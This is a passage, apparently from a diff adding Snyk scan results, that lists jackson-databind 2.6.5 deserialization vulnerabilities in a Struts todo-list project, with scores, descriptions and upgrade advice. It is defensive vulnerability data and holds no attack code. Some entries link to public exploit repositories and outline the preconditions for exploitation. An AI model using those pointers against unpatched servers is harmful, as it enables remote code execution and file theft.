+ "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:53:50.077144Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N/E:P", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.9, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:09:15.371549Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", + "assigner": "NVD", + "severity": "medium", + "baseScore": 5.9, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:36.647712Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:50.077144Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. A Polymorphic Typing issue was discovered in FasterXML jackson-databind 2.x through 2.9.9. When Default Typing is enabled (either globally or for a specific property) for an externally exposed JSON endpoint and the service has JDOM 1.x or 2.x jar in the classpath, an attacker can send a specifically crafted JSON message that allows them to read arbitrary local files on the server.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. 
_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.9.1, 2.8.11.4, 2.7.9.6 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/5f7c69bba07a7155adde130d9dee2e54a54f1fa5)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2341)\n- [PoC Repository](https://github.com/Al1ex/CVE-2019-12814)\n", + "epssDetails": { + "percentile": "0.87218", + "probability": "0.01539", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-12814" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-cmfg-87vq-g5g4" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2019-06-19T15:28:46.421239Z", + "functions_new": [ + { + "version": [ + "[2.9.0,2.9.9.1)", + "[2.8.0,2.8.11.4)", + "[,2.7.9.6)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-06-19T14:34:16Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": 
"com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2019-06-19T14:34:16Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:50.077144Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-450917", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H", + "credit": [ + "College of software Nankai University" + ], + "semver": { + "vulnerable": [ + "[2.9.0,2.9.9.1)", + "[2.8.0,2.8.11.4)", + "[,2.7.9.6)" + ] + }, + "exploit": "High", + "fixedIn": [ + "2.9.9.1", + "2.8.11.4", + "2.7.9.6" + ], + "patches": [], + "insights": { + "triageAdvice": "This vulnerability is only applicable when the feature Polymorphic Type Handling (PTH) is enabled." 
+ }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.9.0,2.9.9.1)", + "[2.8.0,2.8.11.4)", + "[,2.7.9.6)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://lists.debian.org/debian-lts-announce/2019/06/msg00019.html", + "title": "Debian Security Announcement" + }, + { + "url": "https://github.com/jas502n/CVE-2019-12384", + "title": "Exploit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/blob/a6667bcd1f0114f5b004d5203f4139b1e6104a1c/src/main/java/com/fasterxml/jackson/databind/jsontype/impl/SubTypeValidator.java", + "title": "Github Fix" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2334", + "title": "GitHub Issue" + }, + { + "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Jackson CVEs Don't Panic - Blog" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/blob/a6667bcd1f0114f5b004d5203f4139b1e6104a1c/release-notes/VERSION-2.x", + "title": "Release Notes" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 5.9, + "modificationTime": "2024-03-11T09:53:36.645685Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:50.734463Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": 
"2024-03-06T14:04:45.683422Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", + "assigner": "NVD", + "severity": "medium", + "baseScore": 5.9, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:36.645685Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:50.734463Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data which allows attackers to have a variety of impacts by leveraging failure to block the `logback-core` class from polymorphic deserialization. Depending on the `classpath` content, remote code execution may be possible.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.9.1, 2.8.11.4, 2.7.9.6 or higher.\n## References\n- [Debian Security Announcement](https://lists.debian.org/debian-lts-announce/2019/06/msg00019.html)\n- [Exploit](https://github.com/jas502n/CVE-2019-12384)\n- [Github Fix](https://github.com/FasterXML/jackson-databind/blob/a6667bcd1f0114f5b004d5203f4139b1e6104a1c/src/main/java/com/fasterxml/jackson/databind/jsontype/impl/SubTypeValidator.java)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2334)\n- [Jackson CVEs Don't Panic - Blog](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [Release Notes](https://github.com/FasterXML/jackson-databind/blob/a6667bcd1f0114f5b004d5203f4139b1e6104a1c/release-notes/VERSION-2.x)\n", + "epssDetails": { + "percentile": "0.97607", + "probability": "0.53288", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-12384" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-mph4-vhrx-mv67" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2019-06-25T10:06:54.889582Z", + "functions_new": [ + { + "version": [ + "[2.9.0,2.9.9.1)", + "[2.8.0,2.8.11.4)", + "[,2.7.9.6)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-05-28T10:27:59Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + 
"maturityLevels": [ + { + "type": "secondary", + "level": "High", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2019-06-25T10:26:29Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:50.734463Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-455617", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2.9.0,2.9.9.2)", + "[2.8.0,2.8.11.4)", + "[,2.7.9.6)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.9.9.2", + "2.8.11.4", + "2.7.9.6" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.9.0,2.9.9.2)", + "[2.8.0,2.8.11.4)", + "[,2.7.9.6)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/compare/jackson-databind-2.9.9.1...jackson-databind-2.9.9.2", + "title": "GitHub Comparison" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2387", + "title": "GitHub Issue" + 
}, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2389", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2395", + "title": "GitHub Issue" + }, + { + "url": "https://snyk.io/blog/jackson-deserialization-vulnerability/", + "title": "Snyk Blog" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:47:45.849047Z" + }, + { + "assigner": "Red Hat", + "severity": "critical", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:53:54.502907Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:09:40.033731Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:45.849047Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:54.502907Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. 
`SubTypeValidator.java` mishandles default typing when `ehcache` is used, leading to remote code execution.\n\n\n **NOTE:** This vulnerability has also been identified as: [CVE-2019-14439](https://security.snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-6056407)\n\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. 
An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.9.2, 2.8.11.4, 2.7.9.6 or higher.\n## References\n- [GitHub Comparison](https://github.com/FasterXML/jackson-databind/compare/jackson-databind-2.9.9.1...jackson-databind-2.9.9.2)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2387)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2389)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2395)\n- [Snyk Blog](https://snyk.io/blog/jackson-deserialization-vulnerability/)\n", + "epssDetails": { + "percentile": "0.83638", + "probability": "0.00984", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-14379" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-6fpp-rgj9-8rwc", + "GHSA-gwp4-hfv6-p7hw" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": 
"2019-07-29T14:55:33.030000Z", + "functions_new": [ + { + "version": [ + "[2.9.0,2.9.9.2)", + "[2.8.0,2.8.11.4)", + "[,2.7.9.6)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-07-29T12:40:42Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2019-07-29T12:40:42Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:54.502907Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-467014", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2.9.0,2.9.10)", + "[2.7.0,2.8.11.5)", + "[,2.6.7.3)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.9.10", + "2.8.11.5", + "2.6.7.3" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.pr2)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + 
"moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/73c1c2cc76e6cdd7f3a5615cbe3207fe96e4d3db", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2449", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:47:54.800234Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:53:53.931793Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:42.808389Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:54.800234Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:53.931793Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. 
A Polymorphic Typing issue was discovered as `com.zaxxer.hikari.HikariDataSource` was not blocked.\r\n**Note:** This is a different vulnerability than CVE-2019-14540.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. 
An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10, 2.8.11.5, 2.6.7.3 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/73c1c2cc76e6cdd7f3a5615cbe3207fe96e4d3db)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2449)\n", + "epssDetails": { + "percentile": "0.71702", + "probability": "0.00342", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-16335" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-85cw-hj65-qqv9" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2019-09-16T13:03:06.837179Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.pr2)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-09-15T23:30:24Z", 
+ "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2019-09-16T23:30:24Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:53.931793Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-467015", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:F", + "credit": [ + "iSafeBlue" + ], + "semver": { + "vulnerable": [ + "[2.9.0,2.9.10)", + "[2.7.0,2.8.11.5)", + "[,2.6.7.3)" + ] + }, + "exploit": "Functional", + "fixedIn": [ + "2.9.10", + "2.8.11.5", + "2.6.7.3" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.10.0.pr2)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/LeadroyaL/cve-2019-14540-exploit", + "title": "Exploit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/commit/d4983c740fec7d5576b207a8c30a63d3ea7443de", + "title": "GitHub Commit" + }, + { + "url": 
